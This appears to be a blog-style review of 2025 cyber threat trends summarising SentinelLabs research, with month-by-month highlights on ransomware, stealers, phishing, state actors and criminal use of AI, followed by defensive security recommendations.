Over the past twelve months, threat actors have changed their operational approach in ways previously unseen. For one, many threat actors (North Korean being the most prominent) are monitoring the same cyber threat intelligence platforms that defenders use to share indicators of compromise. Another change when it was discovered that free-tier platforms were abused to create massive phishing operations with over 38,000 malicious subdomains.

2025 also saw artificial intelligence transition from theoretical threat to practical reality. AI has emerged as a force multiplier, with threat actors weaponizing large language models to scale attacks, generate convincing social engineering content, and automate previously manual processes.

Key Trends in 2025

This is a summary of some key high-level points to summarize 20205.

AI Weaponization Across the Threat Spectrum: Artificial intelligence has matured from a theoretical threat to an operational accelerator for bad actors. Malicious large language models are language models are intentionally created without safety constraints to support cybercrime. These models generate phishing emails, malware code, and automated attack workflows. Examples would be runtime code generation via MalTerminal or CAPTCHA bypassing via AkiraBot. This has lowered barriers for both sophisticated and commodity attacks.

Threat Actors Monitoring Defensive Intelligence: North Korean operators and others are actively monitoring platforms like Validin and VirusTotal to detect their own infrastructure exposure in near real-time as well as to look at potential targets. Validin is a DNS Intelligence platform and VirusTotal is an online service that analyzes suspicious files, URLs, domains, and IP addresses using over 70 antivirus engines and URL/domain blacklists.

Industrial-Scale Cryptocurrency & Credentials Theft: Highly organized, business-like criminal operations such as FreeDrain and PXA Stealer prove cryptocurrency and credential theft at scale has evolved into a professional sector with sophisticated infrastructure and monetization pipelines. FreeDrain is a global, industrial-scale cryptocurrency phishing operation that has been active for years, primarily targeting cryptocurrency wallets and it is growing every month. PXA Stealer is a password stealing malware that steals passwords and cookies from web browsers, credentials for VPN and FTP clients, and various forms of data from digital wallets, Discord, and cloud file-sharing applications. Credential theft is even being offered as malware as a service product.

Ransomware’s Relentless Business Model Evolution: The ransomware ecosystem saw innovations like DragonForce’s “white-label” branding service as a way to further commoditize their ransomware products. DragonForce offers its subscribers the ability to build multiple variants of the DragonForce ransomware, tailored to specific platforms including Windows, Linux, EXSi, and NAS systems. With the convergence of hacktivist and profit motivations, and the blurring of distinct ransomware families it is becoming harder to track as they evolve.

Exploitation of Legitimate Platforms: Threat actors have increasingly leveraged trusted infrastructure for malicious purposes: Telegram for C2 and data monetization, free-tier publishing platforms for phishing campaigns, and cloud services for hosting and evasion. Once such example is FreeDrain. They use SEO manipulation, free-tier web services like gitbook.io, webflow.io, and github.io, and layered redirection techniques to target cryptocurrency wallets. In the last few years, they have expanded to become a global cryptocurrency phishing operation.

China’s Hidden Offensive Capabilities: Research into Hafnium-linked companies and firms that provide Censorship as a Service to government customers has revealed deep integration between China’s private cybersecurity sector and state offensive operations. Hafnium is a cyber espionage group, sometimes known as advanced persistent threat. It operates with alleged ties to the Chinese government, particularly its Ministry of State Security. Hafnium employs many contract “hackers” and they have a web of resources at their disposal operating all over the world.

Developments in Social Engineering: Through ClickFix techniques such as fake CAPTCHA pages, and increasingly convincing fake job offers, threat actors have found new ways to exploit user psychology to deliver malware. ClickFix is where attackers trick users into executing malicious code themselves, often by posing as a “fix” for a browser error or a human verification step. It is designed to bypass security defenses by using legitimate, trusted system tools.

Month by Month Highlights

This will summarize some monthly activity in 2025.

January

It was uncovered that HellCat and Morpheus ransomware operations were essentially two distinct brands deploying identical ransomware payloads, illustrating the commoditization and rebranding practices within the RaaS ecosystem. This finding provided more understanding on how common code is sourced and shared across ransomware groups. This can improve detection efforts and enrich threat intelligence on their operations.

February

The analysis of leaked data from TopSec, a Beijing-based cybersecurity firm, revealed how China’s private sector provides Censorship as a Service to enforce government content monitoring. The leaked work logs showed TopSec delivering bespoke monitoring services to a state-owned enterprise precisely when a corruption investigation was announced, offering rare insight into public-private coordination for managing sensitive events and controlling public opinion in China. This analysis reveals how China’s private cybersecurity sector directly enables state surveillance and censorship operations, highlighting the interconnected nature of commercial security firms and government offensive capabilities.

March

It was found that ReaderUpdate, a macOS malware loader that had been largely dormant since 2023 has been updated. New samples showed the threat actors had expanded the loader’s capabilities by adding Go to its existing arsenal of Crystal, Nim, and Rust variants, creating a “melting pot” of macOS malware designed to evade detection through diverse implementation languages. ReaderUpdate’s use of multiple programming languages presents unique challenges for detection and analysis. It will require detection strategies that focus on behavior and artifacts rather than language-specific signatures.

April

AkiraBot was discovered. It is an AI-powered Python framework using OpenAI to generate custom spam messages targeting website contact forms and chat widgets. AI-generated content in AkiraBot bypasses traditional spam filters by creating unique messages for each target, exposing the challenges AI poses to traditional website spam defenses.

May

FreeDrain was discovered through an investigation that started with a $500,000 theft. Collaborative efforts exposed an industrial-scale cryptocurrency phishing operation using SEO manipulation and over 38,000 distinct subdomains across free publishing platforms. FreeDrain’s abuse of thousands of subdomains on trusted free-tier platforms demonstrates that without stronger default safeguards, identity verification, or proper abuse response infrastructure, free publishing platforms will continue to be abused, undermining user trust and inflicting real-world financial harm.

June

Katz Stealer, an emerging Malware-as-a-Service platform targeting credentials and crypto assets became very common. A malicious version of the Termius SSH client was released and it included the macOS.ZuRu malware with a modified Khepri C2 framework concealed inside. Also, DPRK activity and the macOS NimDoor malware family were noticed. This is a Nim-based backdoor specifically designed to target Web3 and crypto platforms on Mac endpoints. This is a notable switch as attackers are targeting what was once considered an obscure tool set.

July

Following Department of Justice indictments of two hackers working for China’s Ministry of State Security, it was found that these individuals filed ten patents under previously registered companies linked to the Hafnium group for highly intrusive forensics and data collection technologies. This shows that understanding the companies behind attacks and their documented capabilities, not just observed behavior, is essential for comprehensive threat intelligence.

August

Collaborative efforts exposed the PXA Stealer campaign. It is a Python-based operation that had previously infected more than 4,000 unique victims across 62 countries. The stolen data included over 200,000 passwords, hundreds of credit card records, and more than 4 million browser cookies, and was monetized through a Vietnamese-speaking cybercriminal ecosystem using Telegram APIs. Stealer campaigns have become increasingly automated, and supply-chain integrated. PXA Stealer exemplifies a growing trend in which legitimate infrastructure is weaponized at scale.

September

Another collaborative effort exposed how North Korean threat actors behind the Contagious Interview campaign were actively monitoring cyber threat intelligence platforms to detect infrastructure exposure. The research revealed coordinated teams using Slack for real-time collaboration and rapidly deploying replacement infrastructure when services took down their assets

October

It was found that threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a “ClickFix”-style fake Cloudflare captcha page. The final payload was a multi-stage WebSocket RAT, hosted on Russian-owned infrastructure, with an array of offensive features including arbitrary remote command execution, data exfiltration, and the potential deployment of additional malware. User awareness training on “ClickFix”-style social engineering techniques can help prevent attacks using this infection vector. TLS inspection is also a great tool to assist in catching these intrusive downloads. XDR can also help with network security teams monitoring for WebSocket connections to recently registered or suspicious domains.

November

In a win for the good guys, researchers showed how modern intelligence platforms could accelerate identification of threat campaigns through infrastructure correlation and automated discovery techniques. Modern adversaries rotate domains and replicate infrastructure templates, which can limit the value of isolated indicators. Analysts need time-aware, cross-source analysis to identify shared traits and connect related assets.

December

Analysis of large language models found that while LLMs are being adopted by cyber criminals, they currently serve as operational accelerators rather than revolutionary tools, streamlining reconnaissance, improving phishing, and speeding up attack stages without fundamentally changing ransomware methodology. With today’s LLMs, the risk is not super intelligent malware but industrialized extortion, requiring defenders to adapt to faster operational tempo rather than novel capabilities.

Conclusion

Artificial intelligence has emerged, not as a game-changer but as a force multiplier on the threat landscape. Meanwhile, cybercriminals operate industrial-scale operations with professional infrastructure, business hours, and customer service models much like legitimate enterprises. Nation-state actors monitor the same intelligence platforms defenders use, turning the information security community’s own tools into reconnaissance resources.

With an adversary landscape in which attribution has become increasingly complex, and the line between hacktivist and profit-motivated operations continues to blur, the enterprise security needs will have to adapt just as quickly.

A layered model is still highly recommended. It should, at a very minimum, have the following features.

End user training: The end user is the first line of defense, but it is also the most vulnerable. End user training must be deployed and enforced.

Secure Edge Solutions: The shift from centralized corporate office to working from home, has extended the security perimeter to wherever the user is. This essentially has made the credentials the perimeter. Secure edge solutions provide consistent security policies for hybrid work, replace complex VPNs, and protect against modern threats using zero-trust, cloud-native frameworks by extending the concepts of a firewall down to the mobile endpoint. These include MFA, network security, and web proxies to inspect traffic.

EDR/XDR and the SOC: Endpoint protection and security operations center monitoring are key components of any protection plan. Having more than one EDR/XDR solution is also becoming more common.

Firewall: All offices must have the protection of a modern firewall that incorporates Real-time AI/ML-powered antivirus for the in-line detection of ransomware and zero-day attacks. This can include anti-phishing, anti-spam, anti-virus, and anti-bot capabilities. Intrusion Prevention Systems (IPS), SSL/TLS encrypted traffic inspection, and application-level awareness to block high-risk apps is also important. It must also be able to force the concept of “least-privileged” access and even enforce access by user identity.

Identity Protection: Multifactor Authentication (MFA) must be used on all capable applications to add a layer of security beyond passwords. If applications support it, SAML integrations should be performed with the company directory to reduce administration overhead, secure the application, and simplify login. Password management is equally important. Using unique, complex passwords for every account via a proper password manager is the best way to accomplish this.

This article summarizes cyber activity reported on by SentinelOne SentinelLabs. Their original sources can provide more detail for readers who wish to dive deeper into the mentioned subjects. To start, refer to this article from SentinelOne SentinelLabs.